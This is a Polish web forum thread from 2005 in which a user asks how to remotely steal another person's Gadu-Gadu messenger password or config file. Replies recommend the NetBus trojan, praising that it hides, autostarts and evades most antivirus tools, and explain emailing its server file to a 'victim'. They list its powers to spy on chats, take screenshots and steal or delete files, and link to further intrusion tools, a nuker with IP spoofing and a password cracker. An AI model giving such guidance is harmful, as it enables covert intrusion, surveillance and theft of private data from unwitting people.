Nie możesz znaleźć potrzebnej aplikacji, napisz o tym, a na pewno użytkownicy forum postarają się pomóc.
Wyślij odpowiedź

config.dat

16 Paź 2005, 20:49

mam pytanie, jak można ściągnąć plik config.dat (z foldera gg oczywiście) z innego komputera, lub jak wyciągnąć hasło z gg od innej osoby, ale przez internet, ostatnio był taki temat na forum, ale jakoś wole napisać to jeszcze raz :P pozdro4all

16 Paź 2005, 21:05

Jest taki program NetBus (podobno najlepsza wersja v1,6) jest jeden plik ma max 5kb i go trzeba schować najlepiej do windowsa i go odpalasz na tym kompie nad którym chcemy przejąć kontrole. Wystarczy tylko raz odpalic i on sie bedzie zawsze automatycznie odpalal. Ty masz na kompie swoim program do któego wpisujesz IP tego kompa co chcesz sie włamać i jak on ma tylko kompa do neta podłączonego możesz widziec co pisze na gg widzieć wszystko co wpisuje, przesyłać sobie na kompa zrzuty z ekranu. Bardzo fajny program i 3/4 anty wirów nie zunaje go za wirusa

Opis tego programu ale po angielsku:
http://www.tcp-ip-info.de/trojaner_und_viren/nbv16.htm

16 Paź 2005, 21:22

dzięki Tlenowy, ale nigdzie nie ma tego programu, szukałem na googlach, ale nic nie ściągłem. Szukam też programu którym można by było sterować innym kompem, np wchodzić i usówać pliki z folderów itp.

16 Paź 2005, 21:32

Z usówaniem to najlepiej jest iść i usiąść do kompa otworzyć dysk C zaznaczyć wszystko i nacisnąć Delete :P A ten net bus jest typowo do zabawy. Ja się tym w kafejce bawiłem. Ubaw jest super, ktos siedzi przy kompie a tu mi sie nagle otwiera i zamyka cdrom albo jakies opisay na gg mu robisz. Poszukam tego programu i jak znajde to dam link.

znalazłem:
http://www.tcp-ip-info.de/trojaner_und_viren/netbus_eng.htm
Wersja 1,60 jest prostsza
Po sciągnięciu anty wir jak skanowałem plik wykrył trojana, powienien to być ten netbus czyli bezpieczny ale nie gwarantuje. Do tego netbusa prawdopodobnie będzie potrzebny jeszcze serwer (ten trzeci plik ale nie jestem tego pewien)

16 Paź 2005, 21:58

dzięki :D pobawie się z tym, pozdro

16 Paź 2005, 22:03

Programy tego typu wykozystuje sie w taki iz wysyła sie "server"czyli mały w wielkosci plik na maila lub inne źrudło docelowe.Które otwiera "ofiara".
Mówiac jasniej osoba1 wysyla plik osobie2 która otwiera plik i poprzez to zostaje zainstalowany na jej pc server. Nastepnie osoba1 wykozystujac program który posiada operuje server'em i posiada moziwosci m.in.
-> Otwieranie, zamykanie cd-rom'u
-> Wykradanie jakich kolwiek plików z dysku osoby2(np;jakis plik który znajduje sie w lokalizacji: C:\Documents and Settings\nazwa usera\Gadu-Gadu\nazwa usera\archiwum)
-> wylaczenia zegara systemowego w tray'u
-> wyłaczenie\właczenie wygaszacza
-> zmiana pulpitu
-> pokazanie\schowanie ikon pulpitu
-> wylogowanie
-> zrestartowanie pc
-> wylaczenie funkcji Ctrl+Alt+Delete
-> dodanie jakiegos pliku(np tworzymy osobie2..60 folder'ów na pulpicie)
->usuniecie plików z systemu(np:istnieje mozliwosc usuniecia obojetnie jakiego plikó z system'u [pliki systemowe].
-> pokazanie screena pulpitu osoby2
Czyli jak widac programy tego typu dawaja nam wielka władze czyli tak jak bysmy siedzieli przed pc osoby2.
Hmm tak sie zastanawiam czy podac Wam nazwy bezposrednich progtramów....Ok.Ale wiecie co złego to Nie ja. :D
Programy:
-> big_ben_3.0
-> HackTrack2.2
-> new_nishica-Gadu-Killer 1.1 <- posiada przejzysty prosty interfejs zalecane dla początkowących user'ów.
-> nukeit <-Nuker z możliwością wykorzystania funkcji IP spoofing
Inne:
-> RangeScanner<-przydatny scaner serverów
I na razie tyle.powinno wystarczyc. :wink:

16 Paź 2005, 22:12

heh, no to się dopiero pobawię :D podawajcie wiecej takich programów, z góry dzięki :)

17 Paź 2005, 07:21

ja bym jeszcze oferował Łamacz 1.1-Program do łamania haseł w sieci peer-to-peer Windows Network http://www.grzegorz.net/pliki/lamacz.zip tez dobry program polecam :wink:
Wyślij odpowiedź